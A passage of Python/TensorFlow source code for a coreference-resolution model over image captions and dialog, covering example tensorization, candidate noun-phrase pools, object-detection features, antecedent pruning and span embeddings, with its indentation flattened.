def tensorize_example(self, example, is_training):
clusters = example["clusters"]
gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
gold_mention_map = {m:i for i,m in enumerate(gold_mentions)}
cluster_ids = np.zeros(len(gold_mentions))
for cluster_id, cluster in enumerate(clusters):
for mention in cluster:
cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
sentences = example["sentences"]
max_sentence_length = max(len(s) for s in sentences)
max_word_length = max(max(max(len(w) for w in s) for s in sentences), max(self.config["filter_widths"]))
text_len = np.array([len(s) for s in sentences])
tokens = [[""] * max_sentence_length for _ in sentences]
context_word_emb = np.zeros([len(sentences), max_sentence_length, self.context_embeddings.size])
head_word_emb = np.zeros([len(sentences), max_sentence_length, self.head_embeddings.size])
char_index = np.zeros([len(sentences), max_sentence_length, max_word_length])
for i, sentence in enumerate(sentences):
for j, word in enumerate(sentence):
if i == 0:
word = word.lower()
tokens[i][j] = word
context_word_emb[i, j] = self.context_embeddings[word]
head_word_emb[i, j] = self.head_embeddings[word]
char_index[i, j, :len(word)] = [self.char_dict[c] for c in word]
tokens = np.array(tokens)
if self.num_cdd_pool > 0:
# random pick samples to a candidate pool of fixed number
num_cdd_pick = self.num_cdd_pool - len(example["correct_caption_NPs"])
num_cdd_pick = max(1, num_cdd_pick)
cdd_examples = []
all_sentences = list()
for sent in sentences:
all_sentences += sent
candidate_cur = example["pronoun_info"][-1]["candidate_NPs"]
candidate_cur = [' '.join(all_sentences[c[0]:c[1]+1]) for c in candidate_cur]
if not is_training:
sample_times = 0
while len(cdd_examples) < num_cdd_pick:
if not is_training:
random.seed(example["doc_key"] + str(sample_times))
cdd_cur = random.choice(self.cdd_nps)
sample_times += 1
else:
cdd_cur = random.choice(self.cdd_nps)
# samples in candidate pools should not be the same as candidate nps
cdd_text = ' '.join(cdd_cur["sentences"][0]).lower()
repeat_flag = False
for cdd in candidate_cur:
if cdd.lower() == cdd_text:
repeat_flag = True
break
if not repeat_flag:
cdd_examples.append(cdd_cur)
sentences_cdd = [s["sentences"][0] for s in cdd_examples]
max_sentence_length_cdd = max(len(s) for s in sentences_cdd)
max_word_length_cdd = max(max(max(len(w) for w in s) for s in sentences_cdd), max(self.config["filter_widths"]))
text_len_cdd = np.array([len(s) for s in sentences_cdd])
context_word_emb_cdd = np.zeros([len(sentences_cdd), max_sentence_length_cdd, self.context_embeddings.size])
head_word_emb_cdd= np.zeros([len(sentences_cdd), max_sentence_length_cdd, self.head_embeddings.size])
char_index_cdd = np.zeros([len(sentences_cdd), max_sentence_length_cdd, max_word_length_cdd])
tokens_cdd = [[""] * max_sentence_length_cdd for _ in sentences_cdd]
for i, sentence_cdd in enumerate(sentences_cdd):
for j, word_cdd in enumerate(sentence_cdd):
tokens_cdd[i][j] = word_cdd
context_word_emb_cdd[i, j] = self.context_embeddings[word_cdd]
head_word_emb_cdd[i, j] = self.head_embeddings[word_cdd]
char_index_cdd[i, j, :len(word_cdd)] = [self.char_dict[c] for c in word_cdd]
tokens_cdd = np.array(tokens_cdd)
lm_emb_cdd = self.load_lm_embeddings_cdd(cdd_examples)
for len_cdd in text_len_cdd:
example["speakers"].append(['caption',] * len_cdd)
doc_key = example["doc_key"]
if self.use_im_fc:
im_feat = self.load_im_feat(doc_key)
if self.use_im:
detections = example["object_detection"]
has_obj = len(detections) > 0
detections.append(0)
sentences_obj = [self.id2cat[i] for i in detections]
max_sentence_length_obj = max(len(s) for s in sentences_obj)
max_word_length_obj = max(max(max(len(w) for w in s) for s in sentences_obj), max(self.config["filter_widths"]))
text_len_obj = np.array([len(s) for s in sentences_obj])
context_word_emb_obj = np.zeros([len(sentences_obj), max_sentence_length_obj, self.context_embeddings.size])
head_word_emb_obj= np.zeros([len(sentences_obj), max_sentence_length_obj, self.head_embeddings.size])
char_index_obj = np.zeros([len(sentences_obj), max_sentence_length_obj, max_word_length_obj])
tokens_obj = [[""] * max_sentence_length_obj for _ in sentences_obj]
for i, sentence_obj in enumerate(sentences_obj):
for j, word_obj in enumerate(sentence_obj):
tokens_obj[i][j] = word_obj
context_word_emb_obj[i, j] = self.context_embeddings[word_obj]
head_word_emb_obj[i, j] = self.head_embeddings[word_obj]
char_index_obj[i, j, :len(word_obj)] = [self.char_dict[c] for c in word_obj]
lm_emb_obj = self.load_lm_embeddings_obj(example["object_detection"])
speakers = util.flatten(example["speakers"])
speaker_dict = { s:i for i,s in enumerate(set(speakers)) }
speaker_ids = np.array([speaker_dict[s] for s in speakers])
caption_candidates = example["correct_caption_NPs"]
if len(caption_candidates) == 0:
# add 1 NP to avoid empty candidates
caption_candidates = [[0, 0]]
candidate_starts_caption, candidate_ends_caption = self.tensorize_mentions(caption_candidates)
gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
lm_emb_cap, lm_emb_dial = self.load_lm_embeddings(doc_key)
example_tensors = [tokens, context_word_emb, head_word_emb, lm_emb_cap, lm_emb_dial, char_index, text_len, speaker_ids, is_training, gold_starts, gold_ends, cluster_ids, candidate_starts_caption, candidate_ends_caption]
example_tensors.extend([text_len_cdd, context_word_emb_cdd, head_word_emb_cdd, char_index_cdd, lm_emb_cdd, tokens_cdd])
if self.use_im:
example_tensors.extend([text_len_obj, context_word_emb_obj, head_word_emb_obj, char_index_obj, lm_emb_obj, tokens_obj, has_obj])
else:
example_tensors.extend([[0], np.zeros([0, 0, self.context_embeddings.size]),
np.zeros([0, 0, self.head_embeddings.size]),
np.zeros([0, 0, 1]), np.zeros([0, 0, self.lm_size, self.lm_layers]),
np.zeros([0, 1]), False])
if self.use_im_fc:
example_tensors.append(im_feat)
else:
example_tensors.append(np.zeros(self.config["im_fc_feat_size"]))
return example_tensors
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1), tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1), tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c, top_span_cdd_pool_flag=None):
k = util.shape(top_span_emb, 0)
top_span_range = tf.range(k) # [k]
num_cdd_in_pool = tf.reduce_sum(tf.cast(top_span_cdd_pool_flag, tf.int32))
num_cdd_in_dial = k - num_cdd_in_pool
top_span_range_cdd = tf.concat([tf.zeros(num_cdd_in_pool, tf.int32), tf.range(1, num_cdd_in_dial + 1)], 0)
antecedent_offsets = tf.expand_dims(top_span_range_cdd, 1) - tf.expand_dims(top_span_range_cdd, 0) # [k, k]
antecedents_mask = antecedent_offsets >= 1 # [k, k]
fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores, 0) # [k, k]
fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
_, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def distance_pruning(self, top_span_emb, top_span_mention_scores, c):
k = util.shape(top_span_emb, 0)
top_antecedent_offsets = tf.tile(tf.expand_dims(tf.range(c) + 1, 0), [k, 1]) # [k, c]
raw_top_antecedents = tf.expand_dims(tf.range(k), 1) - top_antecedent_offsets # [k, c]
top_antecedents_mask = raw_top_antecedents >= 0 # [k, c]
top_antecedents = tf.maximum(raw_top_antecedents, 0) # [k, c]
top_fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.gather(top_span_mention_scores, top_antecedents) # [k, c]
top_fast_antecedent_scores += tf.log(tf.to_float(top_antecedents_mask)) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def get_predictions_and_loss(self, tokens, context_word_emb, head_word_emb, lm_emb_cap, lm_emb_dial, char_index, text_len, speaker_ids, is_training, gold_starts, gold_ends, cluster_ids, candidate_starts_caption, candidate_ends_caption, text_len_cdd, context_word_emb_cdd, head_word_emb_cdd, char_index_cdd, lm_emb_cdd, tokens_cdd, text_len_obj, context_word_emb_obj, head_word_emb_obj, char_index_obj, lm_emb_obj, tokens_obj, has_obj, im_feat):
self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
self.lexical_dropout = self.get_dropout(self.config["lexical_dropout_rate"], is_training)
self.lstm_dropout = self.get_dropout(self.config["lstm_dropout_rate"], is_training)
if self.use_im_fc:
self.im_dropout = self.get_dropout(self.config["im_dropout_rate"], is_training)
# for all sentences including caption
num_sentences = tf.shape(context_word_emb)[0]
max_sentence_length = tf.shape(context_word_emb)[1]
context_emb_list = [context_word_emb]
head_emb_list = [head_word_emb]
# get char embedding by conv1d on char embeddings of each word
if self.config["char_embedding_size"] > 0:
char_emb_all = tf.get_variable("char_embeddings", [len(self.char_dict), self.config["char_embedding_size"]])
char_emb = tf.gather(char_emb_all, char_index) # [num_sentences, max_sentence_length, max_word_length, emb]
flattened_char_emb = tf.reshape(char_emb, [num_sentences * max_sentence_length, util.shape(char_emb, 2), util.shape(char_emb, 3)]) # [num_sentences * max_sentence_length, max_word_length, emb]
flattened_aggregated_char_emb = util.cnn(flattened_char_emb, self.config["filter_widths"], self.config["filter_size"]) # [num_sentences * max_sentence_length, emb]
aggregated_char_emb = tf.reshape(flattened_aggregated_char_emb, [num_sentences, max_sentence_length, util.shape(flattened_aggregated_char_emb, 1)]) # [num_sentences, max_sentence_length, emb]
context_emb_list.append(aggregated_char_emb)
head_emb_list.append(aggregated_char_emb)
# for candidate pool
num_sentences_cdd = tf.shape(context_word_emb_cdd)[0]
max_sentence_length_cdd = tf.shape(context_word_emb_cdd)[1]
context_emb_list_cdd = [context_word_emb_cdd]
head_emb_list_cdd = [head_word_emb_cdd]
# get char embedding by conv1d on char embeddings of each word
if self.config["char_embedding_size"] > 0:
char_emb_cdd = tf.gather(char_emb_all, char_index_cdd) # [num_sentences, max_sentence_length, max_word_length, emb]
flattened_char_emb_cdd = tf.reshape(char_emb_cdd, [num_sentences_cdd * max_sentence_length_cdd, util.shape(char_emb_cdd, 2), util.shape(char_emb_cdd, 3)]) # [num_sentences * max_sentence_length, max_word_length, emb]
flattened_aggregated_char_emb_cdd = util.cnn(flattened_char_emb_cdd, self.config["filter_widths"], self.config["filter_size"]) # [num_sentences * max_sentence_length, emb]
aggregated_char_emb_cdd = tf.reshape(flattened_aggregated_char_emb_cdd, [num_sentences_cdd, max_sentence_length_cdd, util.shape(flattened_aggregated_char_emb_cdd, 1)]) # [num_sentences, max_sentence_length, emb]
context_emb_list_cdd.append(aggregated_char_emb_cdd)
head_emb_list_cdd.append(aggregated_char_emb_cdd)
context_emb_cdd = tf.concat(context_emb_list_cdd, 2) # [num_sentences, max_sentence_length, emb]
head_emb_cdd = tf.concat(head_emb_list_cdd, 2) # [num_sentences, max_sentence_length, emb]
# extract embedding for NPs in caption here
context_emb = tf.concat(context_emb_list, 2) # [num_sentences, max_sentence_length, emb]
head_emb = tf.concat(head_emb_list, 2) # [num_sentences, max_sentence_length, emb]
text_len_cap = candidate_ends_caption - candidate_starts_caption + 1
max_span_width_cap = tf.math.reduce_max(text_len_cap)
span_indices_cap = tf.expand_dims(tf.range(max_span_width_cap), 0) + tf.expand_dims(candidate_starts_caption, 1) # [num_candidates_cap, max_span_width_cap]
span_indices_cap = tf.minimum(text_len[0] - 1, span_indices_cap) # [num_candidates_cap, max_span_width_cap]
context_emb_cap = tf.gather(context_emb[0], span_indices_cap) # [num_candidates_cap, max_span_width_cap, emb]
head_emb_cap = tf.gather(head_emb[0], span_indices_cap) # [num_candidates_cap, max_span_width_cap, emb]
# project lm_num_layer to 1 and scale
lm_emb_size = util.shape(lm_emb_dial, 2)
lm_num_layers = util.shape(lm_emb_dial, 3)
# for sentences in dialog only
num_sentences_dial = util.shape(lm_emb_dial, 0)
max_sentence_length_dial = util.shape(lm_emb_dial, 1)
# for caption
num_candidates_cap = util.shape(lm_emb_cap, 0)
max_candidate_length_cap = util.shape(lm_emb_cap, 1)
# get projection and scaling parameter
with tf.variable_scope("lm_aggregation"):
self.lm_weights = tf.nn.softmax(tf.get_variable("lm_scores", [lm_num_layers], initializer=tf.constant_initializer(0.0)))
self.lm_scaling = tf.get_variable("lm_scaling", [], initializer=tf.constant_initializer(1.0))
# for lm emb of cap
flattened_lm_emb_cap = tf.reshape(lm_emb_cap, [num_candidates_cap * max_candidate_length_cap * lm_emb_size, lm_num_layers])
flattened_aggregated_lm_emb_cap = tf.matmul(flattened_lm_emb_cap, tf.expand_dims(self.lm_weights, 1)) # [num_candidates_cap * max_candidate_length_cap * emb, 1]
aggregated_lm_emb_cap = tf.reshape(flattened_aggregated_lm_emb_cap, [num_candidates_cap, max_candidate_length_cap, lm_emb_size])
aggregated_lm_emb_cap *= self.lm_scaling
# for lm emb of dial
flattened_lm_emb_dial = tf.reshape(lm_emb_dial, [num_sentences_dial * max_sentence_length_dial * lm_emb_size, lm_num_layers])
flattened_aggregated_lm_emb_dial = tf.matmul(flattened_lm_emb_dial, tf.expand_dims(self.lm_weights, 1)) # [num_sentences_dial * max_sentence_length_dial * emb, 1]
aggregated_lm_emb_dial = tf.reshape(flattened_aggregated_lm_emb_dial, [num_sentences_dial, max_sentence_length_dial, lm_emb_size])
aggregated_lm_emb_dial *= self.lm_scaling
# for lm emb of cdd
num_candidates_cdd = util.shape(lm_emb_cdd, 0)
max_candidate_length_cdd = util.shape(lm_emb_cdd, 1)
flattened_lm_emb_cdd = tf.reshape(lm_emb_cdd, [num_candidates_cdd * max_candidate_length_cdd * lm_emb_size, lm_num_layers])
flattened_aggregated_lm_emb_cdd = tf.matmul(flattened_lm_emb_cdd, tf.expand_dims(self.lm_weights, 1)) # [num_candidates_cdd * max_candidate_length_cdd * emb, 1]
aggregated_lm_emb_cdd = tf.reshape(flattened_aggregated_lm_emb_cdd, [num_candidates_cdd, max_candidate_length_cdd, lm_emb_size])
aggregated_lm_emb_cdd *= self.lm_scaling
context_emb_dial = tf.concat([context_emb[1:, :max_sentence_length_dial], aggregated_lm_emb_dial], 2) # [num_sentences_dial, max_sentence_length_dial, emb]
context_emb_cap = tf.concat([context_emb_cap, aggregated_lm_emb_cap], 2) # [num_candidates_cap, max_candidate_length_cap, emb]
context_emb_dial = tf.nn.dropout(context_emb_dial, self.lexical_dropout) # [num_sentences_dial, max_sentence_length_dial, emb]
context_emb_cap = tf.nn.dropout(context_emb_cap, self.lexical_dropout) # [num_candidates_cap, max_candidate_length_cap, emb]
head_emb_cap = tf.nn.dropout(head_emb_cap, self.lexical_dropout) # [num_candidates_cap, max_candidate_length_cap, emb]
context_emb_cdd = tf.concat([context_emb_cdd, aggregated_lm_emb_cdd], 2) # [num_candidates_cdd, max_candidate_length_cdd, emb]
context_emb_cdd = tf.nn.dropout(context_emb_cdd, self.lexical_dropout) # [num_candidates_cdd, max_candidate_length_cdd, emb]
head_emb_cdd = tf.nn.dropout(head_emb_cdd, self.lexical_dropout) # [num_candidates_cdd, max_candidate_length_cdd, emb]
# len mask for caption and dialog
text_len_dial = text_len[1:]
text_len_mask_dial = tf.sequence_mask(text_len_dial, maxlen=max_sentence_length_dial) # [num_sentence_dial, max_sentence_length_dial]
# extract lstm feature for cap and dial, and flatten to only valid words for dial
context_outputs_cap = self.lstm_contextualize(context_emb_cap, text_len_cap) # [num_candidates_cap, max_candidate_length_cap, emb]
context_outputs_dial = self.lstm_contextualize(context_emb_dial, text_len_dial, text_len_mask_dial) # [num_words_dial, emb]
num_words_dial = util.shape(context_outputs_dial, 0)
num_words = tf.reduce_sum(text_len)
context_outputs = tf.concat([tf.zeros([num_words - num_words_dial, util.shape(context_outputs_dial, 1)]), context_outputs_dial], 0) # [num_words, emb]
context_outputs_cdd = self.lstm_contextualize(context_emb_cdd, text_len_cdd) # [num_candidates_cdd, max_candidate_length_cdd, emb]
# flatten head embedding of only valid words
sentence_indices = tf.tile(tf.expand_dims(tf.range(num_sentences), 1), [1, max_sentence_length]) # [num_sentences, max_sentence_length]
text_len_mask = tf.sequence_mask(text_len, maxlen=max_sentence_length) # [num_sentence, max_sentence_length]
flattened_sentence_indices = self.flatten_emb_by_sentence(sentence_indices, text_len_mask) # [num_words]
flattened_head_emb = self.flatten_emb_by_sentence(head_emb, text_len_mask) # [num_words]
candidate_starts = tf.tile(tf.expand_dims(tf.range(num_words), 1), [1, self.max_span_width]) # [num_words, max_span_width]
candidate_ends = candidate_starts + tf.expand_dims(tf.range(self.max_span_width), 0) # [num_words, max_span_width]
candidate_start_sentence_indices = tf.gather(flattened_sentence_indices, candidate_starts) # [num_words, max_span_width]
candidate_end_sentence_indices = tf.gather(flattened_sentence_indices, tf.minimum(candidate_ends, num_words - 1)) # [num_words, max_span_width]
candidate_mask = tf.logical_and(candidate_ends < num_words, tf.equal(candidate_start_sentence_indices, candidate_end_sentence_indices)) # [num_words, max_span_width]
# keep candidates in dialog, exclude those in caption
candidate_mask_dial = tf.logical_and(candidate_mask, candidate_starts >= text_len[0]) # [num_words, max_span_width]
flattened_candidate_mask_dial = tf.reshape(candidate_mask_dial, [-1]) # [num_words * max_span_width]
candidate_starts_dial = tf.boolean_mask(tf.reshape(candidate_starts, [-1]), flattened_candidate_mask_dial) # [num_candidates_dial]
candidate_ends_dial = tf.boolean_mask(tf.reshape(candidate_ends, [-1]), flattened_candidate_mask_dial) # [num_candidates_dial]
candidate_span_emb_dial = self.get_span_emb_dial(flattened_head_emb, context_outputs, candidate_starts_dial, candidate_ends_dial) # [num_candidates, emb]
# get span emb of candidates in caption
candidate_span_emb_cap = self.get_span_emb_phrases(head_emb_cap, context_outputs_cap, candidate_starts_caption, candidate_ends_caption) # [num_candidates, emb]
candidate_ends_cdd = tf.cumsum(text_len_cdd) + num_words - 1
candidate_starts_cdd = candidate_ends_cdd - text_len_cdd + 1
candidate_span_emb_cdd = self.get_span_emb_phrases(head_emb_cdd, context_outputs_cdd, candidate_starts_cdd, candidate_ends_cdd) # [num_candidates, emb]
if self.use_im:
num_sentences_obj = tf.shape(context_word_emb_obj)[0]
max_sentence_length_obj = tf.shape(context_word_emb_obj)[1]
context_emb_list_obj = [context_word_emb_obj]
head_emb_list_obj = [head_word_emb_obj]
# get char embedding by conv1d on char embeddings of each word
if self.config["char_embedding_size"] > 0:
char_emb_obj = tf.gather(char_emb_all, char_index_obj) # [num_sentences, max_sentence_length, max_word_length, emb]
flattened_char_emb_obj = tf.reshape(char_emb_obj, [num_sentences_obj * max_sentence_length_obj, util.shape(char_emb_obj, 2), util.shape(char_emb_obj, 3)]) # [num_sentences * max_sentence_length, max_word_length, emb]
flattened_aggregated_char_emb_obj = util.cnn(flattened_char_emb_obj, self.config["filter_widths"], self.config["filter_size"]) # [num_sentences * max_sentence_length, emb]
aggregated_char_emb_obj = tf.reshape(flattened_aggregated_char_emb_obj, [num_sentences_obj, max_sentence_length_obj, util.shape(flattened_aggregated_char_emb_obj, 1)]) # [num_sentences, max_sentence_length, emb]
context_emb_list_obj.append(aggregated_char_emb_obj)
head_emb_list_obj.append(aggregated_char_emb_obj)
context_emb_obj = tf.concat(context_emb_list_obj, 2) # [num_sentences, max_sentence_length, emb]
head_emb_obj = tf.concat(head_emb_list_obj, 2) # [num_sentences, max_sentence_length, emb]
num_candidates_obj = util.shape(lm_emb_obj, 0)
max_candidate_length_obj = util.shape(lm_emb_obj, 1)
flattened_lm_emb_obj = tf.reshape(lm_emb_obj, [num_candidates_obj * max_candidate_length_obj * lm_emb_size, lm_num_layers])
flattened_aggregated_lm_emb_obj = tf.matmul(flattened_lm_emb_obj, tf.expand_dims(self.lm_weights, 1)) # [num_candidates_obj * max_candidate_length_obj * emb, 1]
aggregated_lm_emb_obj = tf.reshape(flattened_aggregated_lm_emb_obj, [num_candidates_obj, max_candidate_length_obj, lm_emb_size])
aggregated_lm_emb_obj *= self.lm_scaling
context_emb_obj = tf.concat([context_emb_obj, aggregated_lm_emb_obj], 2) # [num_candidates_obj, max_candidate_length_obj, emb]
context_emb_obj = tf.nn.dropout(context_emb_obj, self.lexical_dropout) # [num_candidates_obj, max_candidate_length_obj, emb]
head_emb_obj = tf.nn.dropout(head_emb_obj, self.lexical_dropout) # [num_candidates_obj, max_candidate_length_obj, emb]
context_outputs_obj = self.lstm_contextualize(context_emb_obj, text_len_obj) # [num_candidates_obj, max_candidate_length_obj, emb]
candidate_ends_obj = tf.cumsum(text_len_obj) - 1
candidate_starts_obj = candidate_ends_obj - text_len_obj + 1
obj_span_emb = self.get_span_emb_phrases(head_emb_obj, context_outputs_obj, candidate_starts_obj, candidate_ends_obj) # [num_candidates, emb]
# concat candidates in caption here
candidate_starts = tf.concat([candidate_starts_cdd, candidate_starts_caption, candidate_starts_dial], 0)
candidate_ends = tf.concat([candidate_ends_cdd, candidate_ends_caption, candidate_ends_dial], 0)
candidate_span_emb = tf.concat([candidate_span_emb_cdd, candidate_span_emb_cap, candidate_span_emb_dial], 0) # [num_candidates, emb]
candidate_cluster_ids_cap = self.get_candidate_labels(candidate_starts_caption, candidate_ends_caption, gold_starts, gold_ends, cluster_ids)
candidate_cluster_ids_dial = self.get_candidate_labels(candidate_starts_dial, candidate_ends_dial, gold_starts, gold_ends, cluster_ids)
candidate_cluster_ids = tf.concat([tf.zeros([util.shape(candidate_starts_cdd, 0)], tf.int32), candidate_cluster_ids_cap, candidate_cluster_ids_dial], 0) # [num_candidates]
candidate_pool_flag = tf.cast(tf.concat([tf.ones(util.shape(candidate_starts_cdd, 0) + util.shape(candidate_starts_caption, 0), tf.int32), tf.zeros(util.shape(candidate_starts_dial, 0), tf.int32)], 0), tf.bool)
candidate_mention_scores = self.get_mention_scores(candidate_span_emb) # [k, 1]
candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
k = tf.minimum(tf.to_int32(tf.floor(tf.to_float(util.shape(candidate_starts, 0)) * self.config["top_span_ratio"])), tf.shape(candidate_mention_scores)[0])
top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
tf.expand_dims(candidate_starts, 0),
tf.expand_dims(candidate_ends, 0),
tf.expand_dims(k, 0),
util.shape(candidate_mention_scores, 0),
True) # [1, k]
top_span_indices.set_shape([1, None])
top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
# coref_ops add extra 0 to top_span_indices, have to remove it here
first_index = tf.gather(top_span_indices, tf.constant([0]))
valid_indices = tf.boolean_mask(top_span_indices, tf.logical_not(tf.equal(top_span_indices, first_index)))
top_span_indices = tf.concat([first_index, valid_indices], 0)
k = util.shape(top_span_indices, 0)
# rearrange top_span to put cdd and cap first
top_span_cdd_pool_flag = tf.gather(candidate_pool_flag, top_span_indices) # [k]
top_span_indices_cdd_cap = tf.boolean_mask(top_span_indices, top_span_cdd_pool_flag)
top_span_indices_dial = tf.boolean_mask(top_span_indices, tf.logical_not(top_span_cdd_pool_flag))
top_span_indices = tf.concat([top_span_indices_cdd_cap, top_span_indices_dial], 0)
top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]
top_span_cdd_pool_flag = tf.gather(candidate_pool_flag, top_span_indices) # [k]
c = tf.minimum(self.config["max_top_antecedents"], k)
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(top_span_emb, top_span_mention_scores, c, top_span_cdd_pool_flag)
dummy_scores = tf.zeros([k, 1]) # [k, 1]
for i in range(self.config["coref_depth"]):
if self.use_im:
att_grid = self.get_span_im_emb(top_span_emb, obj_span_emb) # [k, emb], [k, emb]
with tf.variable_scope("coref_layer", reuse=(i > 0)):
top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
if self.use_im:
top_antecedent_scores_text, top_antecedent_scores_im = self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, im_feat, att_grid, has_obj) # [k, c]
top_antecedent_scores = top_fast_antecedent_scores + (1 - self.vis_weight) * top_antecedent_scores_text + self.vis_weight * top_antecedent_scores_im
else:
top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, im_feat) # [k, c]
top_antecedent_weights = tf.nn.softmax(tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb], 1) # [k, c + 1, emb]
attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb, 1) # [k, emb]
with tf.variable_scope("f"):
f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1), util.shape(top_span_emb, -1))) # [k, emb]
top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
loss = tf.reduce_sum(loss) # []
outputs = [candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores,
tokens_cdd, tokens_obj]
if self.use_im:
outputs.append(att_grid)
else:
outputs.append(tf.zeros([1, 1]))
return outputs, loss
def get_span_emb_dial(self, head_emb, context_outputs, span_starts, span_ends):
span_emb_list = []
span_start_emb = tf.gather(context_outputs, span_starts) # [k, emb]
span_emb_list.append(span_start_emb)
span_end_emb = tf.gather(context_outputs, span_ends) # [k, emb]
span_emb_list.append(span_end_emb)
span_width = 1 + span_ends - span_starts # [k]
if self.config["use_features"]:
span_width_index = span_width - 1 # [k]
with tf.variable_scope("use_feature", reuse=tf.AUTO_REUSE):
span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]]), span_width_index) # [k, emb]
span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
span_emb_list.append(span_width_emb)
if self.config["model_heads"]:
span_indices = tf.expand_dims(tf.range(self.config["max_span_width"]), 0) + tf.expand_dims(span_starts, 1) # [k, max_span_width]
span_indices = tf.minimum(util.shape(context_outputs, 0) - 1, span_indices) # [k, max_span_width]
span_text_emb = tf.gather(head_emb, span_indices) # [k, max_span_width, emb]
with tf.variable_scope("head_scores", reuse=tf.AUTO_REUSE):
self.head_scores = util.projection(context_outputs, 1) # [num_words, 1]
span_head_scores = tf.gather(self.head_scores, span_indices) # [k, max_span_width, 1]
span_mask = tf.expand_dims(tf.sequence_mask(span_width, self.config["max_span_width"], dtype=tf.float32), 2) # [k, max_span_width, 1]
span_head_scores += tf.log(span_mask) # [k, max_span_width, 1]
span_attention = tf.nn.softmax(span_head_scores, 1) # [k, max_span_width, 1]
span_head_emb = tf.reduce_sum(span_attention * span_text_emb, 1) # [k, emb]
span_emb_list.append(span_head_emb)
span_emb = tf.concat(span_emb_list, 1) # [k, emb]
return span_emb # [k, emb]
def get_span_emb_phrases(self, head_emb, context_outputs, span_starts, span_ends):
# context_outputs: [num_candidates_cap, max_candidate_length_cap, emb]
# head_emb [num_candidates_cap, max_span_width_cap, emb]
span_emb_list = []
num_candidates = util.shape(context_outputs, 0)
span_width = 1 + span_ends - span_starts # [num_candidates_cap]
max_span_width = util.shape(context_outputs, 1)
context_emb_size = util.shape(context_outputs, 2)
context_outputs = tf.reshape(context_outputs, [-1, context_emb_size]) # [num_candidates_cap * max_candidate_length_cap, emb]
span_start_indices = tf.range(num_candidates) * max_span_width # [num_candidates_cap]
span_start_emb = tf.gather(context_outputs, span_start_indices) # [num_candidates_cap, emb]
span_emb_list.append(span_start_emb)
span_end_indices = span_start_indices + span_width - 1 # [num_candidates_cap]
span_end_emb = tf.gather(context_outputs, span_end_indices) # [num_candidates_cap, emb]
span_emb_list.append(span_end_emb)
if self.config["use_features"]:
span_width_index = span_width - 1 # [k]
with tf.variable_scope("use_feature", reuse=tf.AUTO_REUSE):
